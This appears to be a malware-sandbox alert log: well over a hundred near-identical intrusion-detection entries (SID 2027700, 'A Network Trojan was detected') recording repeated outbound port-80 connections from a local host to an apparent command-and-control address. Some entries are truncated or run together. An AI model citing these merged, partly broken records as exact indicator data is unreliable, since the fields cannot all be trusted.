                              Timestamp:192.168.2.762.204.41.449953802027700 02/07/23-23:08:10.664703
                              SID:2027700
                              Source Port:49953
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449769802027700 02/07/23-23:07:21.212903
                              SID:2027700
                              Source Port:49769
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449858802027700 02/07/23-23:07:44.420398
                              SID:2027700
                              Source Port:49858
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450051802027700 02/07/23-23:08:38.908724
                              SID:2027700
                              Source Port:50051
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450175802027700 02/07/23-23:09:11.950103
                              SID:2027700
                              Source Port:50175
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450449802027700 02/07/23-23:10:23.123641
                              SID:2027700
                              Source Port:50449
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449772802027700 02/07/23-23:07:21.956084
                              SID:2027700
                              Source Port:49772
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449842802027700 02/07/23-23:07:40.535003
                              SID:2027700
                              Source Port:49842
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449931802027700 02/07/23-23:08:05.263417
                              SID:2027700
                              Source Port:49931
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450277802027700 02/07/23-23:09:39.183924
                              SID:2027700
                              Source Port:50277
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450106802027700 02/07/23-23:08:52.814624
                              SID:2027700
                              Source Port:50106
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450153802027700 02/07/23-23:09:04.508859
                              SID:2027700
                              Source Port:50153
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450420802027700 02/07/23-23:10:14.158819
                              SID:2027700
                              Source Port:50420
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449788802027700 02/07/23-23:07:25.894312
                              SID:2027700
                              Source Port:49788
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449699802027700 02/07/23-23:07:02.789716
                              SID:2027700
                              Source Port:49699
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449802802027700 02/07/23-23:07:29.225910
                              SID:2027700
                              Source Port:49802
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450130802027700 02/07/23-23:08:58.812897
                              SID:2027700
                              Source Port:50130
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450225802027700 02/07/23-23:09:24.183239
                              SID:2027700
                              Source Port:50225
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450047802027700 02/07/23-23:08:37.932300
                              SID:2027700
                              Source Port:50047
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450399802027700 02/07/23-23:10:09.045857
                              SID:2027700
                              Source Port:50399
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450188802027700 02/07/23-23:09:15.102934
                              SID:2027700
                              Source Port:50188
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449976802027700 02/07/23-23:08:18.678576
                              SID:2027700
                              Source Port:49976
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450403802027700 02/07/23-23:10:09.998024
                              SID:2027700
                              Source Port:50403
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450258802027700 02/07/23-23:09:34.513209
                              SID:2027700
                              Source Port:50258
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449798802027700 02/07/23-23:07:28.267776
                              SID:2027700
                              Source Port:49798
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449740802027700 02/07/23-23:07:12.735380
                              SID:2027700
                              Source Port:49740
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449891802027700 02/07/23-23:07:52.534100
                              SID:2027700
                              Source Port:49891
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450436802027700 02/07/23-23:10:19.971883
                              SID:2027700
                              Source Port:50436
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449835802027700 02/07/23-23:07:37.902416
                              SID:2027700
                              Source Port:49835
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449719802027700 02/07/23-23:07:07.624988
                              SID:2027700
                              Source Port:49719
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450261802027700 02/07/23-23:09:35.263577
                              SID:2027700
                              Source Port:50261
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450215802027700 02/07/23-23:09:21.772162
                              SID:2027700
                              Source Port:50215
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450083802027700 02/07/23-23:08:46.810774
                              SID:2027700
                              Source Port:50083
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449986802027700 02/07/23-23:08:21.156437
                              SID:2027700
                              Source Port:49986
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450120802027700 02/07/23-23:08:56.307442
                              SID:2027700
                              Source Port:50120
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449845802027700 02/07/23-23:07:41.253266
                              SID:2027700
                              Source Port:49845
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450014802027700 02/07/23-23:08:28.008248
                              SID:2027700
                              Source Port:50014
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449881802027700 02/07/23-23:07:50.123193
                              SID:2027700
                              Source Port:49881
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450037802027700 02/07/23-23:08:33.640087
                              SID:2027700
                              Source Port:50037
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450202802027700 02/07/23-23:09:18.573599
                              SID:2027700
                              Source Port:50202
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450462802027700 02/07/23-23:10:26.316744
                              SID:2027700
                              Source Port:50462
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450248802027700 02/07/23-23:09:32.043752
                              SID:2027700
                              Source Port:50248
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450284802027700 02/07/23-23:09:40.912417
                              SID:2027700
                              Source Port:50284
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449871802027700 02/07/23-23:07:47.646611
                              SID:2027700
                              Source Port:49871
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450413802027700 02/07/23-23:10:12.452915
                              SID:2027700
                              Source Port:50413
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450027802027700 02/07/23-23:08:31.210464
                              SID:2027700
                              Source Port:50027
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450321802027700 02/07/23-23:09:50.021531
                              SID:2027700
                              Source Port:50321
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450198802027700 02/07/23-23:09:17.611552
                              SID:2027700
                              Source Port:50198
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450376802027700 02/07/23-23:10:03.465876
                              SID:2027700
                              Source Port:50376
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450024802027700 02/07/23-23:08:30.495661
                              SID:2027700
                              Source Port:50024
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450205802027700 02/07/23-23:09:19.325527
                              SID:2027700
                              Source Port:50205
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450057802027700 02/07/23-23:08:40.336371
                              SID:2027700
                              Source Port:50057
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449729802027700 02/07/23-23:07:10.061030
                              SID:2027700
                              Source Port:49729
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449907802027700 02/07/23-23:07:59.344645
                              SID:2027700
                              Source Port:49907
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450235802027700 02/07/23-23:09:27.132915
                              SID:2027700
                              Source Port:50235
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449989802027700 02/07/23-23:08:21.900932
                              SID:2027700
                              Source Port:49989
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449848802027700 02/07/23-23:07:41.988753
                              SID:2027700
                              Source Port:49848
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450426802027700 02/07/23-23:10:15.811820
                              SID:2027700
                              Source Port:50426
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450271802027700 02/07/23-23:09:37.717475
                              SID:2027700
                              Source Port:50271
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450100802027700 02/07/23-23:08:51.207785
                              SID:2027700
                              Source Port:50100
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450373802027700 02/07/23-23:10:02.763122
                              SID:2027700
                              Source Port:50373
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450116802027700 02/07/23-23:08:55.305221
                              SID:2027700
                              Source Port:50116
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449962802027700 02/07/23-23:08:12.926371
                              SID:2027700
                              Source Port:49962
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450033802027700 02/07/23-23:08:32.657521
                              SID:2027700
                              Source Port:50033
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450189802027700 02/07/23-23:09:15.358033
                              SID:2027700
                              Source Port:50189
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449787802027700 02/07/23-23:07:25.659773
                              SID:2027700
                              Source Port:49787
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450218802027700 02/07/23-23:09:22.479535
                              SID:2027700
                              Source Port:50218
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450402802027700 02/07/23-23:10:09.761332
                              SID:2027700
                              Source Port:50402
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449995802027700 02/07/23-23:08:23.383016
                              SID:2027700
                              Source Port:49995
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450111802027700 02/07/23-23:08:54.086078
                              SID:2027700
                              Source Port:50111
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449700802027700 02/07/23-23:07:03.031561
                              SID:2027700
                              Source Port:49700
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449759802027700 02/07/23-23:07:17.049971
                              SID:2027700
                              Source Port:49759
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449889802027700 02/07/23-23:07:52.061130
                              SID:2027700
                              Source Port:49889
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450005802027700 02/07/23-23:08:25.803187
                              SID:2027700
                              Source Port:50005
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450087802027700 02/07/23-23:08:47.809633
                              SID:2027700
                              Source Port:50087
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450378802027700 02/07/23-23:10:03.940156
                              SID:2027700
                              Source Port:50378
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450026802027700 02/07/23-23:08:30.966267
                              SID:2027700
                              Source Port:50026
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449988802027700 02/07/23-23:08:21.653564
                              SID:2027700
                              Source Port:49988
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450255802027700 02/07/23-23:09:33.778377
                              SID:2027700
                              Source Port:50255
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449823802027700 02/07/23-23:07:34.268183
                              SID:2027700
                              Source Port:49823
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449979802027700 02/07/23-23:08:19.443584
                              SID:2027700
                              Source Port:49979
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450451802027700 02/07/23-23:10:23.598729
                              SID:2027700
                              Source Port:50451
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449832802027700 02/07/23-23:07:36.602000
                              SID:2027700
                              Source Port:49832
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450246802027700 02/07/23-23:09:31.574488
                              SID:2027700
                              Source Port:50246
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450442802027700 02/07/23-23:10:21.434131
                              SID:2027700
                              Source Port:50442
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450054802027700 02/07/23-23:08:39.617227
                              SID:2027700
                              Source Port:50054
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450184802027700 02/07/23-23:09:14.118143
                              SID:2027700
                              Source Port:50184
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450397802027700 02/07/23-23:10:08.575838
                              SID:2027700
                              Source Port:50397
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449893802027700 02/07/23-23:07:53.025577
                              SID:2027700
                              Source Port:49893
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449922802027700 02/07/23-23:08:03.022275
                              SID:2027700
                              Source Port:49922
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450369802027700 02/07/23-23:10:01.812383
                              SID:2027700
                              Source Port:50369
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450470802027700 02/07/23-23:10:28.297773
                              SID:2027700
                              Source Port:50470
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449851802027700 02/07/23-23:07:42.712679
                              SID:2027700
                              Source Port:49851
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449804802027700 02/07/23-23:07:29.696240
                              SID:2027700
                              Source Port:49804
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450227802027700 02/07/23-23:09:24.691350
                              SID:2027700
                              Source Port:50227
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450423802027700 02/07/23-23:10:14.904732
                              SID:2027700
                              Source Port:50423
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450061802027700 02/07/23-23:08:41.341687
                              SID:2027700
                              Source Port:50061
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450274802027700 02/07/23-23:09:38.463286
                              SID:2027700
                              Source Port:50274
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450070802027700 02/07/23-23:08:43.541726
                              SID:2027700
                              Source Port:50070
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449794802027700 02/07/23-23:07:27.299792
                              SID:2027700
                              Source Port:49794
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450073802027700 02/07/23-23:08:44.306614
                              SID:2027700
                              Source Port:50073
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450156802027700 02/07/23-23:09:05.211996
                              SID:2027700
                              Source Port:50156
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449950802027700 02/07/23-23:08:09.942679
                              SID:2027700
                              Source Port:49950
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449766802027700 02/07/23-23:07:19.651200
                              SID:2027700
                              Source Port:49766
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450128802027700 02/07/23-23:08:58.335870
                              SID:2027700
                              Source Port:50128
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449775802027700 02/07/23-23:07:22.751531
                              SID:2027700
                              Source Port:49775
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450468802027700 02/07/23-23:10:27.766831
                              SID:2027700
                              Source Port:50468
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449849802027700 02/07/23-23:07:42.221380
                              SID:2027700
                              Source Port:49849
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450042802027700 02/07/23-23:08:36.263611
                              SID:2027700
                              Source Port:50042
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450394802027700 02/07/23-23:10:07.826263
                              SID:2027700
                              Source Port:50394
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450312802027700 02/07/23-23:09:47.795938
                              SID:2027700
                              Source Port:50312
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450385802027700 02/07/23-23:10:05.658909
                              SID:2027700
                              Source Port:50385
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450303802027700 02/07/23-23:09:45.572466
                              SID:2027700
                              Source Port:50303
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450045802027700 02/07/23-23:08:37.461652
                              SID:2027700
                              Source Port:50045
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450017802027700 02/07/23-23:08:28.743485
                              SID:2027700
                              Source Port:50017
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450366802027700 02/07/23-23:10:01.065650
                              SID:2027700
                              Source Port:50366
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449747802027700 02/07/23-23:07:14.171173
                              SID:2027700
                              Source Port:49747
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449877802027700 02/07/23-23:07:49.111852
                              SID:2027700
                              Source Port:49877
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449712802027700 02/07/23-23:07:05.940453
                              SID:2027700
                              Source Port:49712
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450283802027700 02/07/23-23:09:40.653335
                              SID:2027700
                              Source Port:50283
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450414802027700 02/07/23-23:10:12.687095
                              SID:2027700
                              Source Port:50414
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450201802027700 02/07/23-23:09:18.336544
                              SID:2027700
                              Source Port:50201
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450331802027700 02/07/23-23:09:52.497858
                              SID:2027700
                              Source Port:50331
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449896802027700 02/07/23-23:07:53.775433
                              SID:2027700
                              Source Port:49896
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449915802027700 02/07/23-23:08:01.310915
                              SID:2027700
                              Source Port:49915
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450163802027700 02/07/23-23:09:06.937703
                              SID:2027700
                              Source Port:50163
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449714802027700 02/07/23-23:07:06.440544
                              SID:2027700
                              Source Port:49714
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449910802027700 02/07/23-23:08:00.070255
                              SID:2027700
                              Source Port:49910
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449809802027700 02/07/23-23:07:30.882146
                              SID:2027700
                              Source Port:49809
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450196802027700 02/07/23-23:09:17.107942
                              SID:2027700
                              Source Port:50196
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450109802027700 02/07/23-23:08:53.586754
                              SID:2027700
                              Source Port:50109
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449773802027700 02/07/23-23:07:22.191273
                              SID:2027700
                              Source Port:49773
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450137802027700 02/07/23-23:09:00.524989
                              SID:2027700
                              Source Port:50137
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450333802027700 02/07/23-23:09:52.974040
                              SID:2027700
                              Source Port:50333
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450305802027700 02/07/23-23:09:46.051156
                              SID:2027700
                              Source Port:50305
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450392802027700 02/07/23-23:10:07.350927
                              SID:2027700
                              Source Port:50392
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450210802027700 02/07/23-23:09:20.545993
                              SID:2027700
                              Source Port:50210
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449868802027700 02/07/23-23:07:46.881014
                              SID:2027700
                              Source Port:49868
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450428802027700 02/07/23-23:10:16.360693
                              SID:2027700
                              Source Port:50428
                              SID:2027700
                              Source Port:50285
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450048802027700 02/07/23-23:08:38.164092
                              SID:2027700
                              Source Port:50048
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450375802027700 02/07/23-23:10:03.233760
                              SID:2027700
                              Source Port:50375
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450121802027700 02/07/23-23:08:56.541604
                              SID:2027700
                              Source Port:50121
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450322802027700 02/07/23-23:09:50.288220
                              SID:2027700
                              Source Port:50322
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450280802027700 02/07/23-23:09:39.926138
                              SID:2027700
                              Source Port:50280
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450339802027700 02/07/23-23:09:54.482136
                              SID:2027700
                              Source Port:50339
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449797802027700 02/07/23-23:07:28.024524
                              SID:2027700
                              Source Port:49797
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449952802027700 02/07/23-23:08:10.427883
                              SID:2027700
                              Source Port:49952
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449932802027700 02/07/23-23:08:05.505650
                              SID:2027700
                              Source Port:49932
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449748802027700 02/07/23-23:07:14.403704
                              SID:2027700
                              Source Port:49748
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449929802027700 02/07/23-23:08:04.773416
                              SID:2027700
                              Source Port:49929
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450260802027700 02/07/23-23:09:35.014959
                              SID:2027700
                              Source Port:50260
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
